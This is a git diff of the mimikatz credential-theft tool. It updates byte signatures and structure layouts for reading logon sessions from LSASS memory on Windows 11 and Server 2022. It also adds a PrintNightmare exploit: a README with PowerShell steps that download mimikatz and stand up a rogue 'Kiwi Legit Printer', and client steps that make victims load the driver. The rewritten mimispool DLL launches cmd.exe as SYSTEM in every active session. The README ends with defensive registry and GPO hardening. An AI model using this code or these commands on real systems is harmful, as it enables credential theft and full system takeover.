void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
|
||||
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
|
||||
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
|
||||
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
|
||||
void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
|
||||
|
||||
typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);
|
||||
|
@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
|
||||
{
|
||||
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
|
||||
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
|
||||
if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
|
||||
{
|
||||
aRemote.address = containerManager.unk7;
|
||||
|
@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
|
||||
kprintf(L"[UsernameForPacked] ?");
|
||||
break;
|
||||
default:
|
||||
kprintf(L"[?] ?");
|
||||
kprintf(L"[?] ? %u ?", type);
|
||||
}
|
||||
CredFree(Credential);
|
||||
}
|
||||
|
@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
|
||||
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
|
||||
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
|
||||
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
|
||||
@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
|
||||
};
|
||||
#elif defined(_M_IX86)
|
||||
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
|
||||
|
@ -6,7 +6,7 @@
|
||||
#include "kuhl_m_sekurlsa_cloudap.h"
|
||||
|
||||
#if defined(_M_X64)
|
||||
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
|
||||
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
|
||||
KULL_M_PATCH_GENERIC CloudApReferences[] = {
|
||||
{KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}},
|
||||
};
|
||||
@ -35,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
||||
|
||||
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
|
||||
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = CloudApGlobalLogonSessionList;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
|
@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
|
||||
DWORD64 unk3;
|
||||
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||
// ...
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
|
||||
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
|
||||
DWORD unk0;
|
||||
DWORD unk1;
|
||||
DWORD unk2;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
DWORD unk3;
|
||||
DWORD unk4;
|
||||
DWORD unk5;
|
||||
DWORD unk6;
|
||||
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||
// ...
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
|
166
mimispool/README.md
Normal file
166
mimispool/README.md
Normal file
@ -0,0 +1,166 @@
|
||||
## PowerShell commands
|
||||
|
||||
### Server
|
||||
|
||||
#### install
|
||||
```
|
||||
$printerName = 'Kiwi Legit Printer'
|
||||
$system32 = $env:systemroot + '\system32'
|
||||
$drivers = $system32 + '\spool\drivers'
|
||||
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
|
||||
|
||||
Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
|
||||
Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
|
||||
|
||||
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
|
||||
|
||||
Add-PrinterDriver -Name 'Generic / Text Only'
|
||||
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
|
||||
|
||||
```
|
||||
|
||||
#### uninstall
|
||||
```
|
||||
$printerName = 'Kiwi Legit Printer'
|
||||
$system32 = $env:systemroot + '\system32'
|
||||
$drivers = $system32 + '\spool\drivers'
|
||||
|
||||
Remove-Printer -Name $printerName
|
||||
Start-Sleep -Seconds 2
|
||||
Remove-PrinterDriver -Name 'Generic / Text Only'
|
||||
|
||||
Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
|
||||
Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
|
||||
Remove-Item -Force -Path ($system32 + '\mimispool.dll')
|
||||
|
||||
```
|
||||
|
||||
### Client
|
||||
|
||||
#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
|
||||
```
|
||||
$serverName = 'printnightmare.gentilkiwi.com'
|
||||
$username = 'gentilguest'
|
||||
$password = 'password'
|
||||
$printerName = 'Kiwi Legit Printer'
|
||||
|
||||
$fullprinterName = '\\' + $serverName + '\' + $printerName
|
||||
$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
|
||||
|
||||
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
|
||||
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
||||
|
||||
New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
|
||||
Add-Printer -ConnectionName $fullprinterName
|
||||
|
||||
$driver = (Get-Printer -Name $fullprinterName).DriverName
|
||||
Remove-Printer -Name $fullprinterName
|
||||
Remove-PrinterDriver -Name $driver
|
||||
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
|
||||
# mimispool still in spool\drivers
|
||||
|
||||
```
|
||||
|
||||
#### Computer in domain (single sign on with current user to print server)
|
||||
```
|
||||
$serverName = 'print.lab.local'
|
||||
$printerName = 'Kiwi Legit Printer'
|
||||
|
||||
$fullprinterName = '\\' + $serverName + '\' + $printerName
|
||||
|
||||
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
||||
Add-Printer -ConnectionName $fullprinterName
|
||||
|
||||
$driver = (Get-Printer -Name $fullprinterName).DriverName
|
||||
Remove-Printer -Name $fullprinterName
|
||||
Remove-PrinterDriver -Name $driver
|
||||
# mimispool still in spool\drivers
|
||||
|
||||
```
|
||||
|
||||
## Protect
|
||||
_to adapt to your environment_
|
||||
|
||||
**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
|
||||
|
||||
### Registry
|
||||
|
||||
#### `.reg` file
|
||||
```
|
||||
Windows Registry Editor Version 5.00
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
|
||||
"PackagePointAndPrintOnly"=dword:00000001
|
||||
"PackagePointAndPrintServerList"=dword:00000001
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
|
||||
"1"="/your really legit servers or invalid entry !/"
|
||||
```
|
||||
|
||||
#### commands
|
||||
```
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
|
||||
```
|
||||
|
||||
### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
|
||||
|
||||
#### `.reg` file
|
||||
```
|
||||
Windows Registry Editor Version 5.00
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
|
||||
"PackagePointAndPrintOnly"=dword:00000001
|
||||
"PackagePointAndPrintServerList"=dword:00000001
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
|
||||
"srv1.fqdn"="srv1.fqdn"
|
||||
"srv2.fqdn"="srv2.fqdn"
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
|
||||
"RestrictDriverInstallationToAdministrators"=dword:00000000
|
||||
```
|
||||
|
||||
#### commands
|
||||
```
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
|
||||
|
||||
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
### GPO / Local
|
||||
|
||||
In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
|
||||
- `Only use Package Point and Print`
|
||||
- `Package Point and Print - Approved servers`
|
||||
|
||||

|
||||
|
||||
### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
|
||||
|
||||
Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
|
||||
|
||||

|
@ -5,48 +5,36 @@
|
||||
*/
|
||||
#include "mimispool.h"
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL ret = TRUE;
|
||||
|
||||
switch( ul_reason_for_call )
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
|
||||
ret = FALSE;
|
||||
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
|
||||
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
|
||||
break;
|
||||
UNREFERENCED_PARAMETER(hinstDLL);
|
||||
UNREFERENCED_PARAMETER(lpReserved);
|
||||
|
||||
case DLL_THREAD_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
|
||||
break;
|
||||
if (fdwReason == DLL_PROCESS_ATTACH)
|
||||
{
|
||||
RunProcessForAll(L"cmd.exe");
|
||||
}
|
||||
|
||||
case DLL_THREAD_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
|
||||
break;
|
||||
|
||||
case DLL_PROCESS_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
|
||||
break;
|
||||
}
|
||||
|
||||
return ret;
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if ( dwMode == DRVQUERY_USERMODE)
|
||||
if (dwMode == DRVQUERY_USERMODE)
|
||||
{
|
||||
*pcbNeeded = sizeof(DWORD);
|
||||
if (pBuffer && (cbBuf >= sizeof(DWORD)))
|
||||
{
|
||||
status = TRUE;
|
||||
*(DWORD *)pBuffer = TRUE;
|
||||
*(DWORD*)pBuffer = TRUE;
|
||||
}
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
}
|
||||
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
if ((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
{
|
||||
SetLastError(ERROR_BAD_DRIVER_LEVEL);
|
||||
}
|
||||
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
|
||||
|
||||
VOID APIENTRY DrvDisableDriver()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
;
|
||||
}
|
||||
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
}
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
void kspool(LPCWSTR szFrom)
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
FILE * kspool_logfile;
|
||||
WCHAR Buffer[256 + 1];
|
||||
DWORD cbBuffer = ARRAYSIZE(Buffer);
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4996)
|
||||
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
|
||||
#pragma warning(pop)
|
||||
{
|
||||
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
|
||||
fclose(kspool_logfile);
|
||||
}
|
||||
}
|
||||
|
||||
void klog(FILE * logfile, PCWCHAR format, ...)
|
||||
{
|
||||
if(logfile)
|
||||
{
|
||||
va_list args;
|
||||
va_start(args, format);
|
||||
vfwprintf(logfile, format, args);
|
||||
va_end(args);
|
||||
fflush(logfile);
|
||||
}
|
||||
}
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszDirectory);
|
||||
UNREFERENCED_PARAMETER(pSplClientInfo);
|
||||
UNREFERENCED_PARAMETER(dwLevel);
|
||||
UNREFERENCED_PARAMETER(pszSourceDir);
|
||||
UNREFERENCED_PARAMETER(pcchSourceDirSize);
|
||||
UNREFERENCED_PARAMETER(pszTargetDir);
|
||||
UNREFERENCED_PARAMETER(pcchTargetDirSize);
|
||||
UNREFERENCED_PARAMETER(dwFlags);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszKey);
|
||||
UNREFERENCED_PARAMETER(dwCopyFileEvent);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
STARTUPINFO si = { 0 };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
HANDLE hToken, hNewToken;
|
||||
DWORD i, count;
|
||||
LPVOID Environment;
|
||||
PSESSIONIDW sessions;
|
||||
|
||||
si.cb = sizeof(si);
|
||||
si.lpDesktop = L"winsta0\\default";
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
{
|
||||
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
|
||||
{
|
||||
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
|
||||
{
|
||||
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
|
||||
{
|
||||
for (i = 0; i < count; i++)
|
||||
{
|
||||
if (sessions[i].State == State_Active)
|
||||
{
|
||||
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
|
||||
{
|
||||
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
|
||||
{
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(pi.hProcess);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (sessions)
|
||||
{
|
||||
WinStationFreeMemory(sessions);
|
||||
}
|
||||
}
|
||||
DestroyEnvironmentBlock(Environment);
|
||||
}
|
||||
CloseHandle(hNewToken);
|
||||
}
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
@ -1,10 +1,11 @@
|
||||
LIBRARY
|
||||
EXPORTS
|
||||
; PrintNightMare 2.x - via config file and/or "real driver"
|
||||
DrvResetConfigCache
|
||||
DrvQueryDriverInfo
|
||||
DrvEnableDriver
|
||||
DrvDisableDriver
|
||||
|
||||
DrvResetConfigCache
|
||||
|
||||
; PrintNightMare 4.x - via CopyFiles
|
||||
GenerateCopyFilePaths
|
||||
SpoolerCopyFileEvent
|
@ -5,35 +5,75 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <userenv.h>
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
|
||||
#define PLATFORM L"x64"
|
||||
#elif defined(_M_IX86)
|
||||
#define PLATFORM L"x86"
|
||||
#endif
|
||||
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
|
||||
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
|
||||
|
||||
typedef LONG_PTR (APIENTRY *PFN)();
|
||||
#define LOGONID_CURRENT ((ULONG) -1)
|
||||
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
|
||||
#define MAX_THINWIRECACHE 4
|
||||
#define WINSTATIONNAME_LENGTH 32
|
||||
#define DOMAIN_LENGTH 17
|
||||
#define USERNAME_LENGTH 20
|
||||
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
|
||||
|
||||
typedef enum _WINSTATIONSTATECLASS {
|
||||
State_Active = 0,
|
||||
State_Connected = 1,
|
||||
State_ConnectQuery = 2,
|
||||
State_Shadow = 3,
|
||||
State_Disconnected = 4,
|
||||
State_Idle = 5,
|
||||
State_Listen = 6,
|
||||
State_Reset = 7,
|
||||
State_Down = 8,
|
||||
State_Init = 9
|
||||
} WINSTATIONSTATECLASS;
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4201)
|
||||
typedef struct _SESSIONIDW {
|
||||
union {
|
||||
ULONG SessionId;
|
||||
ULONG LogonId;
|
||||
} DUMMYUNIONNAME;
|
||||
WINSTATIONNAME WinStationName;
|
||||
WINSTATIONSTATECLASS State;
|
||||
} SESSIONIDW, * PSESSIONIDW;
|
||||
#pragma warning(pop)
|
||||
|
||||
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
|
||||
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
|
||||
|
||||
typedef LONG_PTR(APIENTRY* PFN)();
|
||||
|
||||
typedef struct _DRVFN {
|
||||
ULONG iFunc;
|
||||
PFN pfn;
|
||||
} DRVFN, *PDRVFN;
|
||||
} DRVFN, * PDRVFN;
|
||||
|
||||
typedef struct tagDRVENABLEDATA {
|
||||
ULONG iDriverVersion;
|
||||
ULONG c;
|
||||
DRVFN *pdrvfn;
|
||||
} DRVENABLEDATA, *PDRVENABLEDATA;
|
||||
DRVFN* pdrvfn;
|
||||
} DRVENABLEDATA, * PDRVENABLEDATA;
|
||||
|
||||
#define DRVQUERY_USERMODE 1
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
|
||||
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
|
||||
|
||||
void kspool(LPCWSTR szFrom);
|
||||
void klog(FILE * logfile, PCWCHAR format, ...);
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
